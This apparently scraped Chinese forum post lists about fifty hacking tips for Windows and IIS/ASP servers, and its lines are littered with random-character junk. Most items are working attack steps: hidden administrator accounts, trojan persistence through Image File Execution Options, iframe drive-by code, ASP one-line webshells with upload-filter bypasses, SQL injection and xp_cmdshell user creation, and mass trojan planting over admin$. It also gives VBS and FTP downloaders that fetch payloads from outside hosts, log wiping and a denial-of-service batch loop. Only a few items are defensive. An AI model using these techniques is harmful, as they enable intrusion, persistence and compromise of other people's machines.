1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,& ?* y' C; @+ a
cacls C:\windows\system32 /G hqw20:R: T4 U. E& a( v2 V& ]- }. K
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
! `$ J7 c) i0 B恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F' n a& M7 e' a3 }, B
% |3 X- [ ?6 W' o; X2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。2 y5 |1 O: W$ ?: {- f
6 f1 s9 S9 y. p% _1 C q6 k
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& u' n- D& T* a/ q3 }7 d
6 y' O$ W* o2 c
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# N; O+ H% s( \# j& T1 s7 l: W' C5 z% S- \2 M2 a% u/ f
5、利用INF文件来修改注册表
) h5 K; _) ]# Q$ C( Y[Version]
! g- F* Y; Z Q! j$ wSignature="$CHICAGO$"
- ~6 P% |$ Z5 A! n4 N/ \- _[Defaultinstall]
) P/ x: T0 R1 F. n# [) _$ r0 waddREG=Ating: ~, K3 N. n; f3 [" O7 M
[Ating]
9 o: k Q' o6 v1 Y: D$ ?HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) ]3 f6 R) D7 Z) E% H" g以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! _0 D! h7 w e8 i! i0 _5 hrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 o6 d4 x5 b9 {% B其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU. T9 [7 v2 x! N9 e& O3 F. m% [
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 }: d. s( u. L) hHKEY_CURRENT_CONFIG 简写为 HKCC
0 D9 h7 }2 v5 T; Z# ^/ w' p' J/ }0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值: w( \' F) R/ E3 E4 F) a
"1"这里代表是写入或删除注册表键值中的具体数据
5 V* D$ Z- R+ l7 M% j! _
+ c4 G5 {' D" |9 W0 a+ W6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 t! N' ?' ^+ g" P$ ]( q
多了一步就是在防火墙里添加个端口,然后导出其键值$ h2 q. L/ I$ y' Q6 }
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
8 q$ w% W" K7 z I( N: P; \+ S
! R$ N) D. _4 |7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽) g7 A! N0 s7 r0 n* e. \
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。7 @4 V! s9 X" T& t7 a. {
G! `0 u; ]1 D! `& g$ S% ~; m
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。/ _( i9 p( j. v- b
) H. w/ @# E) g1 U# L) }# X& r
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
4 Z' ?+ _. L, n) t8 I) H: G可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。0 c7 u4 g1 l/ T$ ?. g6 o
. I& n) ^. L2 a) @8 B% \10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”4 Y5 A. B8 z ]. k) }
! {, @0 O0 `+ O$ r* Q: E) f11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) g$ N9 V- j, U) [( f用法:xsniff –pass –hide –log pass.txt
- e: K8 U5 Y9 ^* \" g
0 m' W! ?0 w6 K6 T& @12、google搜索的艺术
0 w) N( X% P( x4 L, s Q搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
! k: x& i7 L0 ~0 b0 y6 z或“字符串的语法错误”可以找到很多sql注入漏洞。
2 Y) n( S0 O: ^; ^. f( m8 a+ l g7 f) d4 s
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 r5 ?; `, j$ ]2 Q) d( ?8 E, c% A7 \ `, a
14、cmd中输入 nc –vv –l –p 1987) h2 I! _( ]. O
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# G" F: k; M1 C% u7 g; A a# D5 t+ }/ o, t v' i, Q* e2 y1 A
15、制作T++木马,先写个ating.hta文件,内容为5 a% I+ g S4 h& }( O5 e
<script language="VBScript"># X J# e% U. ?6 ^) q2 I6 _2 ]
set wshshell=createobject ("wscript.shell" )
( r. z; O# K( @7 p# s4 ca=wshshell.run("你马的名称",1)6 w( S3 y3 h- r! g
window.close6 O3 t5 f; q, C- E$ n* Z& _1 o' T
</script>
5 E* | r/ A6 X3 y9 m+ k再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 f" X& c# S/ @& O
2 B5 c9 U7 K& e# k# m16、搜索栏里输入
) w& c& T0 k7 g1 X6 S8 L关键字%'and 1=1 and '%'='' a# }+ t# W1 G. ^
关键字%'and 1=2 and '%'='! V3 G' Q9 u) t" r3 e' D, [9 l2 T
比较不同处 可以作为注入的特征字符
5 v/ V5 |4 `" ?7 D* C& Y# `; U! V5 e7 R
17、挂马代码<html>/ o; s; @. g" _0 L! P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& M5 [7 w/ b0 N5 V! c0 _. {
</html>' N" N# X# q* o
8 I" W3 P( C8 s18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,8 w9 m4 C' U) \) K' l
net localgroup administrators还是可以看出Guest是管理员来。% ~ l4 e7 }8 E% c3 B4 x9 j8 S, l* n
; [5 {% k5 J7 n" r) j8 ?19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等; A- x4 D) E. i0 U
用法: 安装: instsrv.exe 服务名称 路径
2 I: D6 P) a2 F+ \ m卸载: instsrv.exe 服务名称 REMOVE
( P5 w% j. w& `* b8 t1 K6 j- T2 u& j6 L; f$ c/ Q3 w( q; j2 L8 \5 t
7 G$ Y* q; l0 i9 y* H/ r# l
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉4 n3 D8 s( u( V, J8 U" u' f8 l
不能注入时要第一时间想到%5c暴库。
. g. t9 v# c5 |) U. Y8 S
( e9 K- S: P$ |. b+ [3 U22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 H$ H$ ?* g5 R3 J5 m" |7 F9 c0 @- k2 Y0 ]4 A
23、缺少xp_cmdshell时* ~9 K) J& K8 Z: V- T: i8 b
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': D. [' e: o' z7 y% |, {
假如恢复不成功,可以尝试直接加用户(针对开3389的)
! L/ y$ O2 T* M. ?declare @o int# h3 a5 P) g" ?
exec sp_oacreate 'wscript.shell',@o out, Z; B' c2 `- P4 f; A: _
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% z4 l) K* @- n
# x' Z9 P/ t" Z" w% O& c/ n5 m24.批量种植木马.bat$ F8 D1 s) t" J( f
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中& T: J% i% I4 b* V& Z$ v
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 g6 A% \! C% n! H% }5 p# m+ }
扫描地址.txt里每个主机名一行 用\\开头9 i& n' V3 @, A4 Y, z) C
& F5 F6 G$ V5 O. h6 {; X7 s25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
0 k1 E$ y8 Y2 }7 ^5 x9 C( {! j: M/ C1 G
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
- w' S4 p) E- I' Q将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.* w# q7 h4 J9 u1 K& y) R+ w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& @" y4 g! V0 V) U2 @2 K, x' Z' O
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
+ N( D# ~1 S8 m9 |/ {, O* I然后用#clear logg和#clear line vty *删除日志0 W4 ^1 C+ `9 S0 P! t) o p
' G; }2 g9 f+ K
28、电脑坏了省去重新安装系统的方法
w3 ^- l8 F, ] r! e: y$ Z纯dos下执行,
. u5 A) v; P- F# P! q$ w5 I9 O5 wxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config) {7 g& O9 s: r. G* x8 Y
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config6 c& ?" b. e; { F% i' e8 z
, O! [1 g; K# g
29、解决TCP/IP筛选 在注册表里有三处,分别是:! r* R* D: p7 h4 w& s
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
! h v/ K3 ?; i* ?6 g3 r- Z" RHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 X8 L2 }! G# c. UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# K( M6 _( D; `/ P1 P! _分别用
$ x! B. t9 [& F S. nregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ r. `+ d6 ^4 Uregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) E. y9 ^; p3 ^$ [5 B& |' x2 Z5 p3 Bregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, {; Q% W% t! E) T
命令来导出注册表项
% x6 m% Y4 _1 z0 {3 y4 ?) |然后把三个文件里的EnableSecurityFilters"=dword:00000001,. P0 z' @* G2 W
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 t& [) L, ]7 a$ Mregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 ~' d- q" r. ?( V9 `
: }* i& T0 ^+ [4 `3 h+ B& o2 L6 O9 H2 g30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U: w( \" m0 t+ u/ E$ F% r
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; G, f2 g- S" d) E
4 C! e" u8 s1 m9 P31、全手工打造开3389工具
6 u: t& q3 k. v* [打开记事本,编辑内容如下:
9 @2 t/ w1 c; X* Iecho [Components] > c:\sql
0 O( h* x$ X7 R/ Oecho TSEnable = on >> c:\sql7 r! F6 v4 z2 r! [6 L% d
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
b2 y( L0 \7 d编辑好后存为BAT文件,上传至肉鸡,执行
; l2 k, W" j" e E6 ~8 M/ ~8 l& N
" F* `2 @# S `# ]# ]- }' `8 H32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
D* J, ?( V6 e: [# d
5 ~( Q! Q! M% J6 Z& K5 Z33、让服务器重启
7 y, k( K' G7 e" v6 I1 x; O写个bat死循环:4 q3 Y9 P1 x' B2 H2 h% T' u: z
@echo off
0 }6 R& [0 {' S:loop1
6 }7 r8 U9 x3 l' ?9 ]cls8 c5 f) X9 F7 Q) |, f
start cmd.exe2 P0 E* m$ M& U6 }0 I
goto loop1
' l/ Y$ D/ Q. p& [6 X- s保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启 ]9 s3 n9 r: C) z
& y; \- O0 r. {) f F) d
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
# T$ o. W) q0 ^7 d: B5 }8 \@echo off
4 \/ q; ?: W. mdate /t >c:/3389.txt! I0 i5 G C5 P: A$ Z
time /t >>c:/3389.txt3 X5 e6 A% s* A8 ]; @
attrib +s +h c:/3389.bat+ \$ ~5 A. w( N9 `
attrib +s +h c:/3389.txt
+ i3 _8 M7 Z' U, T* Wnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ n( c ` M. p, {1 E并保存为3389.bat
; O E" M; w2 h( i- ] K打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
$ \" L' T3 J) m) A
) x' A$ p4 ^" P4 T35、有时候提不了权限的话,试试这个命令,在命令行里输入:$ v: d. }$ A) i* z
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 E5 ~7 d1 s9 O. F
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
: ^9 ?# ~! b9 c3 r
+ T" C Y: P/ z+ v) x/ |9 j7 p36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 x9 [$ N7 i: [echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
+ H; l% ]' I4 O% z. }' Y! e9 ?echo 你的FTP账号 >>c:\1.bat //输入账号1 X0 i& m. F% O: B* H# p; _. G
echo 你的FTP密码 >>c:\1.bat //输入密码
5 l# @+ @$ `6 F5 `2 r+ C6 Iecho bin >>c:\1.bat //登入8 l+ |0 M' h4 B. b! E1 y0 L* k
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
- ]1 q( J+ T( c# x1 Becho bye >>c:\1.bat //退出7 m0 M; W' x2 T9 E8 b( n+ X
然后执行ftp -s:c:\1.bat即可2 \5 l; p$ r- l$ {5 g5 b7 a9 E5 k
- ?' \; L' q- N, ~; [. J
37、修改注册表开3389两法
5 u+ ~# ]# C& v3 b6 t& A5 T1 ?6 C. D(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表0 h0 _$ g8 t$ g( Q5 y
echo Windows Registry Editor Version 5.00 >>3389.reg/ e0 |/ m) y2 [6 { n2 B# ], X, {8 g
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
7 k2 q0 z9 y# T, W# q+ z3 xecho "Enabled"="0" >>3389.reg
- G6 c6 M5 w/ J4 {7 F! x1 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# d3 q- R: B* Z8 v2 zNT\CurrentVersion\Winlogon] >>3389.reg
# I" u! N/ r% ^& ~echo "ShutdownWithoutLogon"="0" >>3389.reg8 [* j6 I3 N p+ o+ V, ~' m6 ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! {+ k$ F* n! T% C( h2 n2 w j>>3389.reg
9 |- T, y& v2 N+ W Wecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg# p2 _& D, k- P; O `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]8 P' [) w! D/ z) u% Y* l6 [
>>3389.reg
2 T0 _1 y. i) ~. R; Lecho "TSEnabled"=dword:00000001 >>3389.reg
; N6 @9 ^! r/ Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 U. ^) W( U+ Hecho "Start"=dword:00000002 >>3389.reg$ z5 q1 X7 u6 l" o4 G' U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
2 [7 x2 @1 v: S2 [+ H>>3389.reg
K: q5 R7 y( B0 C5 l& u% n* Secho "Start"=dword:00000002 >>3389.reg
( U, ]7 J8 ~# m# \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
, }$ K. W1 E0 s& n, R" T/ uecho "Hotkey"="1" >>3389.reg
: J; E3 ?6 B- i @$ Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 {' \7 F- S9 ]$ ?
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
5 [# F, S6 O- I' o( F( `" Gecho "PortNumber"=dword:00000D3D >>3389.reg
9 i; v$ N9 h! cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! a/ [! m7 Z; E' L/ ^! [
Server\WinStations\RDP-Tcp] >>3389.reg
& J9 `. i: s, \7 q' H- l6 V% z5 becho "PortNumber"=dword:00000D3D >>3389.reg
0 B0 T: ~8 h$ {' X! U6 Q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。: r3 l" M3 f2 ]* R
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
5 h$ Q6 F, V5 V( x8 c/ _4 I因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; p: S+ t- B3 j(2)winxp和win2003终端开启
3 i" m" w2 G! y8 W; z; L用以下ECHO代码写一个REG文件:1 d3 G/ w5 B" G- z" w
echo Windows Registry Editor Version 5.00>>3389.reg
6 `; G& u& N r( Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
g6 t6 @( C+ y$ u2 m9 r H- AServer]>>3389.reg5 O. p. i. i7 p& a4 a
echo "fDenyTSConnections"=dword:00000000>>3389.reg
; N0 g' D, L+ V) Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# o( Z) i* N: R) kServer\Wds\rdpwd\Tds\tcp]>>3389.reg
^5 N& O6 U6 {3 a3 w6 u- gecho "PortNumber"=dword:00000d3d>>3389.reg
, X% G: }( N. n7 Q. ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: N! |! c2 z7 g! |: N$ eServer\WinStations\RDP-Tcp]>>3389.reg6 _) E6 q* s3 {: p" K+ R' N8 v' K3 [
echo "PortNumber"=dword:00000d3d>>3389.reg
4 b/ r+ _: t: V: b然后regedit /s 3389.reg del 3389.reg) u0 V q& q4 }+ U+ I% m* ?8 f" H
XP下不论开终端还是改终端端口都不需重启( y ~' ^$ i3 i) ^/ {( n! Q
4 p: l- f" R! U9 b
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
/ N+ z9 P6 Y- C* l* q用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& m6 Q- t/ [+ T
' O, C+ ?) V/ t) {/ y5 c' J6 x39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
% h& R* T# O6 V8 f7 l(1)数据库文件名应复杂并要有特殊字符
1 i* a: _! K- W/ G(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
. X4 ^# \: w3 k将conn.asp文档中的& ^, n. ~' y/ C% H* ?1 {" L2 W
DBPath = Server.MapPath("数据库.mdb")
/ |1 t5 O2 U. Lconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
# S- t$ _6 z8 M' l/ }- s* }1 I" q6 r
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置 I8 l% _8 o6 B& ~2 W
(3)不放在WEB目录里4 z7 Q/ Y) A$ S. v9 M
, p! Q& s( m, h) c* Y; y40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉8 T- A1 G3 W7 \3 ~0 @; }6 `& G7 y5 j
可以写两个bat文件
@2 _3 v: c, \% I3 o A@echo off
6 i$ j! A3 |7 s2 f- s1 k6 a/ d@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
5 K; F3 R$ W: t& m( A' w@del c:\winnt\system32\query.exe0 w. P3 d, i4 ?
@del %SYSTEMROOT%\system32\dllcache\query.exe& H, _" C: w2 Q. Z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的7 a4 s& U* @; O0 L$ B
2 E$ h" g7 X. M* Z, N d
@echo off
]/ M3 |! e c8 p@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
3 @# r8 N5 e0 h- Q% A4 u@del c:\winnt\system32\tsadmin.exe# p t. h: s4 L$ b$ L0 c7 {8 P
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
3 A2 h9 H7 q- K4 T. i/ J* {- E7 }8 J6 c; W7 k
41、映射对方盘符, v3 ?$ D: z: G: z9 P
telnet到他的机器上,
3 J0 l" {5 x+ n' i3 y9 O7 Hnet share 查看有没有默认共享 如果没有,那么就接着运行
4 L- F2 V$ d+ o2 tnet share c$=c:
b/ `% _. _( ^- e E( J; b( F' K1 bnet share现在有c$8 p6 y/ |0 V3 S4 y
在自己的机器上运行 P) e9 K/ y) |% P
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K6 P* ?# B! }. ~- N
8 A( M( \6 ]- i42、一些很有用的老知识
8 \+ s- {, B3 b, P3 j/ B, Ctype c:\boot.ini ( 查看系统版本 )
6 R2 A {! U1 |$ T' Anet start (查看已经启动的服务)9 P; z; H9 p$ h. q
query user ( 查看当前终端连接 )
5 t7 |& j- @. K) vnet user ( 查看当前用户 )
: E I, R# j6 Y: qnet user 用户 密码/add ( 建立账号 )
8 P) T8 Q9 c6 N6 Cnet localgroup administrators 用户 /add (提升某用户为管理员)8 n/ O4 j& \) W
ipconfig -all ( 查看IP什么的 )
! A0 k' v. k$ S. Lnetstat -an ( 查看当前网络状态 )% g; ?# P$ t8 ~
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. O. D) H0 ?! ^2 Q4 k克隆时Administrator对应1F4
; a) j, e' c. I1 S! ?' pguest对应1F5: A/ W. n l6 |6 U3 |
tsinternetuser对应3E8
& q8 c; ]; v6 D; B4 n8 y3 m2 H8 S I+ |! S8 B( s
43、如果对方没开3389,但是装了Remote Administrator Service$ Y8 n _$ U+ \. ~- ^
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
4 G$ ]" P( W) O P4 C7 V, M解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" W' W9 V+ E: D- N8 G |先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! S, _0 ?9 k& K# s
/ x* z! _% w0 X, Q% N44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)' x7 i# h- e7 i* a; T2 G9 x
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口); Z$ k, v" U$ b' {
5 Z; W; Z4 u& q8 G& D4 x
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)+ X* v( n/ O. Z. K
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
% E1 T3 V) {$ w^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
! k- |, j/ _! `CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
8 Z# I3 T. {9 O: P1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs3 } L# g" z4 k6 o
(这是完整的一句话,其中没有换行符); ]+ _( V; z' b# v* I
然后下载:
" h4 Z' E# i' a3 p- C# C1 Xcscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 ]% M1 {( h, L6 b" C% ^0 S% a7 b
46、一句话木马成功依赖于两个条件:8 l% A% u2 r* K3 ~1 u4 Q, Z
1、服务端没有禁止adodb.Stream或FSO组件
: s# C. p: b, M" {0 T+ Z2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
5 ~. ^( n' H3 V* L- A$ @. p: }) S
47、利用DB_OWNER权限进行手工备份一句话木马的代码:+ E/ {* D! O6 Q
;alter database utsz set RECOVERY FULL--
! [7 E% ?; B; ^; z;create table cmd (a image)--! A' E6 [% e( A8 G
;backup log utsz to disk = 'D:\cmd' with init--
7 M7 \) z: X4 B2 M5 V4 h;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--5 o6 n0 x1 K1 k' f) t, A
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 N4 g: ^8 y* S* ?" K注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。+ H5 Z' v" ]) x0 c' d) l; J
' }& H" ^5 s) ~5 \$ t# l+ J
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:0 H5 y$ i' l: o
. ?* P5 d. @$ W0 l; m. s0 L' U% |
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
* [$ W& f2 M/ }# i所有会话用 'all'。
* N: x6 g" Q& r+ v. Y-s sessionid 列出会话的信息。3 u: X. l# ], V! ? C- b
-k sessionid 终止会话。
$ {3 L+ P* e/ g ? \-m sessionid 发送消息到会话。
% k- p$ n) B1 I& T# ]0 a) b9 z, `# I- Y/ K4 \' Q8 O j: \
config 配置 telnet 服务器参数。
% N( O: g( b6 T7 \
S1 f/ G) q3 zcommon_options 为:
+ I! a0 C1 i W( o-u user 指定要使用其凭据的用户* E: x. z5 Y1 _4 m) y
-p password 用户密码$ K* ]8 D* \) P- U5 |
7 E% c: g+ r# N" O; p! [config_options 为:1 o& u, q! G3 B
dom = domain 设定用户的默认域! Z. ]% Y+ Z1 w, {4 Y
ctrlakeymap = yes|no 设定 ALT 键的映射
% _8 Q2 F2 `5 \1 R: `+ \timeout = hh:mm:ss 设定空闲会话超时值
4 `" P6 n9 u5 Ntimeoutactive = yes|no 启用空闲会话。
: E a. Q. k, t7 N* `( g1 j4 H/ B4 Xmaxfail = attempts 设定断开前失败的登录企图数。
; W& l7 } C imaxconn = connections 设定最大连接数。
/ `+ u2 S# z1 z% w" [: Eport = number 设定 telnet 端口。. g |: z" B3 L `* B; o
sec = [+/-]NTLM [+/-]passwd
' H7 q$ a9 [# W& J设定身份验证机构+ A/ `' M2 v/ z5 d; l: n. V
fname = file 指定审计文件名。# n+ t5 Z& p u) _& L/ l, a- k. h9 \
fsize = size 指定审计文件的最大尺寸(MB)。
4 X: |) F+ h$ y4 Vmode = console|stream 指定操作模式。# |) D8 v+ Q2 g4 P& F
auditlocation = eventlog|file|both
, X' L' ^; h9 c9 `7 n: W指定记录地点+ U- Q* I5 w# I- H6 ]4 t1 B
audit = [+/-]user [+/-]fail [+/-]admin
2 F L' Q& Y9 Y! v# n0 q, B* O: `5 {* U* T% |! U$ F) ?$ v2 w" m0 h
49、例如:在IE上访问:
+ f2 \7 G: f0 v" owww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
$ X( d1 m: d! Z* _$ d+ Nhack.txt里面的代码是:1 F1 W& q& P- Y- D* d k" h
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">' Z, [: p7 C! X$ I
把这个hack.txt发到你空间就可以了!
6 n+ F1 C5 E; u这个可以利用来做网马哦!
7 |& R4 ~ h' H& X# o/ S& s h& ~7 f
50、autorun的病毒可以通过手动限制!) T I( \$ W: _ t/ z6 F
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!" _; R% q& h" h" Z: o# b" ^- ?
2,打开盘符用右键打开!切忌双击盘符~
6 K- t1 \: v3 d8 U. ?1 W. y6 P3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 F( c. }* V" s5 O* H) c
8 p1 x$ I, @+ ~6 E$ p2 U51、log备份时的一句话木马:
* D1 m4 j' ?5 Y, v2 k( ca).<%%25Execute(request("go"))%%25>
3 r( @9 b7 S$ |4 Hb).<%Execute(request("go"))%>
6 Y- I( u- f& A$ e3 hc).%><%execute request("go")%><%1 l+ O* R4 e7 U& B& T' Q
d).<script language=VBScript runat=server>execute request("sb")</Script>
; q: u0 e" {# Z. q* {e).<%25Execute(request("l"))%25>; L0 t6 k. u# @0 v
f).<%if request("cmd")<>"" then execute request("pass")%>
# V5 q _$ U4 z ]* a! r! H3 _; ?+ j7 \$ S7 Z+ L
52、at "12:17" /interactive cmd
! k5 K7 h0 u+ w7 t6 i执行后可以用AT命令查看新加的任务. R0 x# J) k4 v
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。5 g9 O) _1 d& k2 U1 T0 Q
& Z! N g7 K/ a, \5 G2 ~53、隐藏ASP后门的两种方法
T6 O% I; R4 Y' s3 b1、建立非标准目录:mkdir images..\4 Z5 I9 C: c9 c1 R
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
